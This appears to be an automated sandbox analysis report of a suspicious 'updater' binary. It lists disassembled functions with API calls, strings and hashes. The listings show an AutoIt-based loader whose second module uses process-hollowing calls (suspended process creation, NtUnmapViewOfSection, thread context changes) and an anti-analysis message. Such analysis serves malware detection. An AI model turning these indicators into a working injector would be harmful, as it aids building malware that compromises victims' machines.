API ID: FileTime$Find$CloseDateFirstLocal
String ID:
API String ID: 2659516521-0
Opcode ID: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
Instruction ID: 71f00f06dd9fe5561d06e42b0d50e1146df8ad16284a4876bc2bdfd9113e9dea
Opcode Fuzzy Hash: 35532445bcddddf072de4610115932bee76e299e86bdf79fb3123370f2aa134a
Instruction Fuzzy Hash: D3F0B276D0120D66CB61EAE98CCCBCEF3BC5B09314F500792A529D3196EB34AB448B50

Function 00BBB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00BC3740: CharUpperBuffW.USER32(?,00C771DC,00000000,?,00000000,00C771DC,?,00BB53A5,?,?,?,?), ref: 00BC375D

_memmove.LIBCMT ref: 00BBB68A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: 36c7ab8b46ff8f77de571e69bfb27eb1e0eb1747df010cd73b6eeb46d420aeb3
Instruction ID: f819a735c685a9f4c32f4e56e5d70c4fe4525747d23f4c2acc0b82731134354d
Opcode Fuzzy Hash: 36c7ab8b46ff8f77de571e69bfb27eb1e0eb1747df010cd73b6eeb46d420aeb3
Instruction Fuzzy Hash: BDA259706083419FD724DF18C480BAAB7E1FF84704F14899DE99A9B352DBB1ED49CB92

Function 017C34AF Relevance: 1.5, APIs: 1, Instructions: 3libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017C34B3

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
Instruction ID: be68be7296445d1d8c9efe5ed17a0ddc0ed5e3a0c0ce8a40cfea562a1559ef80
Opcode Fuzzy Hash: 74906ca78a5ed234824da2d21b4ef579ad23ae74e18219abc59e4195ec916c3d
Instruction Fuzzy Hash: 24A00231445A80DBDE11DB10CB49B09B761FBC0F01F108E64A0464781457785800D941

Function 00BBBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00BBBF57

Part of subcall function 00BB52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB52E6

Sleep.KERNEL32(0000000A,?,?), ref: 00BF36B5

Strings

@GUI_WINHANDLE, xrefs: 00BF37C1
CALL, xrefs: 00BBC277
@GUI_CTRLHANDLE, xrefs: 00BF3816
@COM_EVENTOBJ, xrefs: 00BF3D2E
@TRAY_ID, xrefs: 00BF3FCD
@GUI_CTRLID, xrefs: 00BF376C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: d6534e4865b62728e9e0f91fa460171eab31eb92b840dcd6b6b4067d40cb2296
Instruction ID: 4d6781a9e5104a65085e44048c30f7f0aafb3a08f5b736306306ca3d47924588
Opcode Fuzzy Hash: d6534e4865b62728e9e0f91fa460171eab31eb92b840dcd6b6b4067d40cb2296
Instruction Fuzzy Hash: 56C28D706083459FD724DF24C894BBEBBE4FF84704F14499DE58A972A1DBB1E988CB42

Function 00BB2BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB2C8C
GetSystemMetrics.USER32(00000007), ref: 00BB2C94
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BB2CBF
GetSystemMetrics.USER32(00000008), ref: 00BB2CC7
GetSystemMetrics.USER32(00000004), ref: 00BB2CEC
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BB2D09
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BB2D19
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BB2D4C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BB2D60
GetClientRect.USER32(00000000,000000FF), ref: 00BB2D7E
GetStockObject.GDI32(00000011), ref: 00BB2D9A
SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB2DA5

Part of subcall function 00BB2714: GetCursorPos.USER32(?), ref: 00BB2727
Part of subcall function 00BB2714: ScreenToClient.USER32(00C777B0,?), ref: 00BB2744
Part of subcall function 00BB2714: GetAsyncKeyState.USER32(00000001), ref: 00BB2769
Part of subcall function 00BB2714: GetAsyncKeyState.USER32(00000002), ref: 00BB2777

SetTimer.USER32(00000000,00000000,00000028,00BB13C7), ref: 00BB2DCC

Strings

AutoIt v3 GUI, xrefs: 00BB2D44

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 36c226750d079d549032e5877f42a42b8ca05d8c8e72aca81a65be027e143a43
Instruction ID: c31a366c9ef39aa5ac0542c179074fb3e239230eca41c458599c105705a7e842
Opcode Fuzzy Hash: 36c226750d079d549032e5877f42a42b8ca05d8c8e72aca81a65be027e143a43
Instruction Fuzzy Hash: D7B15B75A4020AAFDB14DFA8CC99BFD7BF4FB08310F204269FA15A7290DB70A851CB55

Function 017C7C41 Relevance: 25.0, APIs: 6, Strings: 8, Instructions: 464
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,017C8260), ref: 017C7D46
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,017C8260,00000000,00000000,00000000,00000000,00000000,00000004), ref: 017C7D6A
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,017C8260), ref: 017C7D9D
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,017C8260,00000000,00000000,00000000,00000000,00000000,00000004), ref: 017C7DBD
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,017C8260,00000000,00000000,00000000,00000000,00000000,00000004), ref: 017C7DEF

Part of subcall function 017C3915: GetTickCount.KERNEL32 ref: 017C398E

Part of subcall function 017C66D9: MessageBoxA.USER32(00000000,00000000,017C6739,00040040), ref: 017C670C

GetTickCount.KERNEL32 ref: 017C8228

Strings

D, xrefs: 017C7CF6
NtGetContextThread, xrefs: 017C7E43
execution failure, try to assign other file path, xrefs: 017C80E2, 017C8178
NtSetContextThread, xrefs: 017C7FEE
NtUnmapViewOfSection, xrefs: 017C7E9F
NtFreeVirtualMemory, xrefs: 017C81E8
NtTerminateProcess, xrefs: 017C8093, 017C812A, 017C821E
NtResumeThread, xrefs: 017C8045

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CreateProcess$CountTick$Message
String ID: execution failure, try to assign other file path$D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection
API String ID: 2713535555-1661097759
Opcode ID: eac4abad55a41c4e1c02f9cbbe64b78aa0b732f7adc0c90e9fcdcafaaf254d49
Instruction ID: 8304d457bc614290a2b44d0e13d067b2fb92567d027cf4f7fd6a55ddefa27516
Opcode Fuzzy Hash: eac4abad55a41c4e1c02f9cbbe64b78aa0b732f7adc0c90e9fcdcafaaf254d49
Instruction Fuzzy Hash: F512FE70A00219AFDB50DBA8CC85FDEFBF9AB08714F10409DE604F7285DB70AA848F65

Function 00BB33E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB3444
RegisterClassExW.USER32(00000030), ref: 00BB346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB347F
InitCommonControlsEx.COMCTL32(?), ref: 00BB349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB34AC
LoadIconW.USER32(000000A9), ref: 00BB34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB34D1

Strings

AutoIt v3 GUI, xrefs: 00BB3460
+, xrefs: 00BB342D
0, xrefs: 00BB3426
TaskbarCreated, xrefs: 00BB3474

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6fd062f115f02890811fcd5fa1d07d0420b16833c8c2ae81156102036ef96880
Instruction ID: 84bfaab23f3d4c1a66f137a0dce82e83b1c5019622b9349821ed7cf914fb874a
Opcode Fuzzy Hash: 6fd062f115f02890811fcd5fa1d07d0420b16833c8c2ae81156102036ef96880
Instruction Fuzzy Hash: 593149B5884309EFDB408FA4EC88BCDBBF0FB09310F24455AE694A62A0D7B51581CF91

Function 00BB3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BB3444
RegisterClassExW.USER32(00000030), ref: 00BB346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB347F
InitCommonControlsEx.COMCTL32(?), ref: 00BB349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB34AC
LoadIconW.USER32(000000A9), ref: 00BB34C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB34D1

Strings

AutoIt v3 GUI, xrefs: 00BB3460
+, xrefs: 00BB342D
0, xrefs: 00BB3426
TaskbarCreated, xrefs: 00BB3474

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5d3b30a80c4d3670f4f295856e243dca306e8b04780951dcdd2a5cdc6eb31b8a
Instruction ID: 5b15a02797aeb374a2dc82e45a7699d72292a2b9a1442a629aedfb23598fc9cf
Opcode Fuzzy Hash: 5d3b30a80c4d3670f4f295856e243dca306e8b04780951dcdd2a5cdc6eb31b8a
Instruction Fuzzy Hash: 8D21E4B599430DAFDB009FA4EC89B9DBBF4FB09700F10421AFA14A62A0D7B15580CF92

Function 017AF931 Relevance: 18.2, APIs: 9, Strings: 3, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CharNextA.USER32(00000000), ref: 017AF986
CharNextA.USER32(00000000,00000000), ref: 017AF992
CharNextA.USER32(00000000,00000000), ref: 017AF9BA
CharNextA.USER32(00000000), ref: 017AF9C6
CharNextA.USER32(?,00000000), ref: 017AFA07
CharNextA.USER32(00000000,?,00000000), ref: 017AFA13
CharNextA.USER32(00000000,?,00000000), ref: 017AFA4B
CharNextA.USER32(?,00000000), ref: 017AFA57

Strings

, xrefs: 017AF959
", xrefs: 017AFA3C
", xrefs: 017AF9AB

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: CharNext
String ID: $"$"
API String ID: 3213498283-938660540
Opcode ID: 4a4277158661bad59ed7f520321bdf6c52cdd29acf458ec223851d448d85b30f
Instruction ID: 221e7575c67ab44a3d425fa0ff95ffacdb54414ed225b3e3e6af75697d382346
Opcode Fuzzy Hash: 4a4277158661bad59ed7f520321bdf6c52cdd29acf458ec223851d448d85b30f
Instruction Fuzzy Hash: AF510C71608286AFD731DF6CC494E59FBE4EFAA350BA40A59E5C5CB712D334A840CF51

Function 00BC2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BD00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00BC3094), ref: 00BD00ED

Part of subcall function 00BD08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00BC309F), ref: 00BD08E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BC30E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C001BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C001FB
RegCloseKey.ADVAPI32(?), ref: 00C00239
_wcscat.LIBCMT ref: 00C00292

Strings

Software\AutoIt v3\AutoIt, xrefs: 00BC30D8
\, xrefs: 00C002B5
Include, xrefs: 00C001B1, 00C001F2
\Include\, xrefs: 00BC309F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 6762989a5047d1c54b215b59057af8aac8cb7ccf1fd8cdfe6a27470d570d0b0a
Instruction ID: ae9bf4be1702cb0e057c6aa86fb0c4eac3d6ff205474866792619161043d7f45
Opcode Fuzzy Hash: 6762989a5047d1c54b215b59057af8aac8cb7ccf1fd8cdfe6a27470d570d0b0a
Instruction Fuzzy Hash: 91718D714493019AC300EF29E849B6FBBE8FF55341F50092EF659D72A2EF309988CB52

Function 00BC514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00BC5156
LoadCursorW.USER32(00000000,00007F00), ref: 00BC5165
LoadIconW.USER32(00000063), ref: 00BC517C
LoadIconW.USER32(000000A4), ref: 00BC518E
LoadIconW.USER32(000000A2), ref: 00BC51A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BC51C6
RegisterClassExW.USER32(?), ref: 00BC521C

Part of subcall function 00BB3411: GetSysColorBrush.USER32(0000000F), ref: 00BB3444
Part of subcall function 00BB3411: RegisterClassExW.USER32(00000030), ref: 00BB346E
Part of subcall function 00BB3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BB347F
Part of subcall function 00BB3411: InitCommonControlsEx.COMCTL32(?), ref: 00BB349C
Part of subcall function 00BB3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BB34AC
Part of subcall function 00BB3411: LoadIconW.USER32(000000A9), ref: 00BB34C2
Part of subcall function 00BB3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BB34D1

Strings

#, xrefs: 00BC5201
0, xrefs: 00BC51FA
AutoIt v3, xrefs: 00BC520B

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: e6d43bf1cf3a8667a6e0eb4c0f3ecda66362622769c2888e7c1836e0a8b6418f
Instruction ID: 17b94a9036637303b58e240b053ab0229b4a9c83354a841769faa521d9fbd932
Opcode Fuzzy Hash: e6d43bf1cf3a8667a6e0eb4c0f3ecda66362622769c2888e7c1836e0a8b6418f
Instruction Fuzzy Hash: 3A216B70944308EFEB109FA4ED09B9D7FF4FB08710F100269F618A62A2C7B55580CF80

Function 00BC4D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00BC4E22
KillTimer.USER32(?,00000001), ref: 00BC4E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BC4E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BC4E7A
CreatePopupMenu.USER32 ref: 00BC4E8E
PostQuitMessage.USER32(00000000), ref: 00BC4EAF

Strings

TaskbarCreated, xrefs: 00BC4E75

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: fe27741c5d3ee0120c6f8652640680c63ce8b6ef71f143e4bec50d51d846d59d
Instruction ID: b3a1610435702f1504a42467ec649264f4830b2ee037105e114a723965046dc8
Opcode Fuzzy Hash: fe27741c5d3ee0120c6f8652640680c63ce8b6ef71f143e4bec50d51d846d59d
Instruction Fuzzy Hash: AD41F67124460FABDB295F24DC59FBE3AD5F741300F1202ADFA15912E2CB709E90D762

Function 017CA3C9 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,Executing manually will not work,017CA669,00000000), ref: 017CA42A
MessageBoxA.USER32(00000000,no data,017CA669,00000000), ref: 017CA4A2
GetTickCount.KERNEL32 ref: 017CA53A

Strings

vqvdvnxn, xrefs: 017CA3FA
no data, xrefs: 017CA49B
Executing manually will not work, xrefs: 017CA423

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Message$CountTick
String ID: Executing manually will not work$no data$vqvdvnxn
API String ID: 1431039135-1012937922
Opcode ID: e30a56afa387bc04fbe5e15da5309df096f0b01270571aa99a3d494b59e9b032
Instruction ID: b9f2f1e9d48abdfe151fc4f431fb5d9149f2e5bc05f8f244e1ab502d76c63546
Opcode Fuzzy Hash: e30a56afa387bc04fbe5e15da5309df096f0b01270571aa99a3d494b59e9b032
Instruction Fuzzy Hash: 3561E77860410A9FC721EF58D995A9DF3B2EBA8B11F6091ACF805AB35CDB70BC418F51

Function 00BC50DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BC5109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BC512A
ShowWindow.USER32(00000000), ref: 00BC513E
ShowWindow.USER32(00000000), ref: 00BC5147

Strings

AutoIt v3, xrefs: 00BC5101, 00BC5106, 00BC5107
edit, xrefs: 00BC5124

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 9557eb71925da69e2f5da50c13a26ed1f963791a3e87aa4ce95977ec56920dec
Instruction ID: b755ca9bf37749689212f4d504725b3306286a9df815ae659b1e594f4a4349e4
Opcode Fuzzy Hash: 9557eb71925da69e2f5da50c13a26ed1f963791a3e87aa4ce95977ec56920dec
Instruction Fuzzy Hash: 09F01D70544298BAEB2117236C08F2B2E7DF7C6F10F120229BA1492272C5751880DAB0

Function 017C316D Relevance: 9.1, APIs: 6, Instructions: 106filewindowCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,017C75BD,00000001,00000000,00000000,00000000), ref: 017C3189
MessageBoxA.USER32(00000000,017C32A5,017C32A1,00000000), ref: 017C31A3
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,017C75BD,00000001,00000000), ref: 017C31AB
ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 017C31CD
MessageBoxA.USER32(00000000,017C32A9,017C32A1,00000000), ref: 017C31E4
CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 017C328E

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: File$Message$CloseCreateHandleReadSize
String ID:
API String ID: 2324011479-0
Opcode ID: da99b104666a1f8dcab8369d3c0d3b7491c8840127571ac8b6a8ddd5f36fb9b8
Instruction ID: d9b2ffc04ee084c0531abdd624b9c0a00dcb3005cb0b8a8bb24ec03a06ce467e
Opcode Fuzzy Hash: da99b104666a1f8dcab8369d3c0d3b7491c8840127571ac8b6a8ddd5f36fb9b8
Instruction Fuzzy Hash: 0B31F774248301AFD354EF29CC85F5AF3E5FF88B10F50892DF9949B299D770E8458A51

Function 00C19B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00BC4A8C: _fseek.LIBCMT ref: 00BC4AA4

Part of subcall function 00C19CF1: _wcscmp.LIBCMT ref: 00C19DE1
Part of subcall function 00C19CF1: _wcscmp.LIBCMT ref: 00C19DF4

_free.LIBCMT ref: 00C19C5F
_free.LIBCMT ref: 00C19C66
_free.LIBCMT ref: 00C19CD1

Part of subcall function 00BD2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD9C54,00000000,00BD8D5D,00BD59C3), ref: 00BD2F99
Part of subcall function 00BD2F85: GetLastError.KERNEL32(00000000,?,00BD9C54,00000000,00BD8D5D,00BD59C3), ref: 00BD2FAB

_free.LIBCMT ref: 00C19CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00C19B8F

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
